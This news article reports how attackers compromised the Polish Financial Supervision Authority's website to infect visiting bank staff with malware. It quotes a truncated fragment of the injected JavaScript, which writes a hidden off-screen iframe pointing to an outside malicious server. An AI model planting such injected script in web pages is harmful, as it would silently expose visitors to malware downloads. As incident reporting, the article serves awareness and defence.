Crooks hacked Polish banks with a malware planted on Government site

Several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.

Polish banks are investigating a massive cyber attack after a malware was spotted on several servers of the financial institutions.

The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.

The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”

The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.

“It has been a busy week in SOCs all over the polish financial sector. At least a few of polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble.” reported the website “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”

According to first findings of the investigation, the KNF’s website had been compromised that had modified one of the site’s JavaScript files.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

The injected JS file resulted in visitors to the KNF website loading an external JS file which then download the malware from an external server and installed it.

To unauthorized code was stored in the following file:

and looked like that:

document.write(“<div id=’efHpTk’ width=’0px’ height=’0px’><iframe name=’forma’ src=’https://sap.misapor

.ch/vishop/view.jsp?pagenum=1′ width=’145px’ height=’146px’ style=’left:-2144px;position:absolute;top


At the time I was writing, both the KNF and the Polish government confirmed that there is no indication that crooks have stolen money from the banks.

“Significantly, we do not have so far any information related to these attacks, successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money.” reported the local media  “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but due to the fact that the data were prior to shipment by criminals encrypted, to determine what was stolen can be difficult.”

The unique certainly is that the incident could be considered to be the largest system hack of ever in the country’s financial sector.

The IOCs are available on the website.

Pierluigi Paganini

FAIR USE NOTICE: Under the "fair use" act, another author may make limited use of the original author's work without asking permission. Pursuant to 17 U.S. Code § 107, certain uses of copyrighted material "for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright." As a matter of policy, fair use is based on the belief that the public is entitled to freely use portions of copyrighted materials for purposes of commentary and criticism. The fair use privilege is perhaps the most significant limitation on a copyright owner's exclusive rights. Cyber Defense Media Group is a news reporting company, reporting cyber news, events, information and much more at no charge at our website Cyber Defense Magazine. All images and reporting are done exclusively under the Fair Use of the US copyright act.

Global InfoSec Awards 2022

We are in our 10th year, and these awards are incredibly well received – helping build buzz, customer awareness, sales and marketing growth opportunities, investment opportunities and so much more.


10th Anniversary Exclusive Top 100 CISO Conference & Innovators Showcase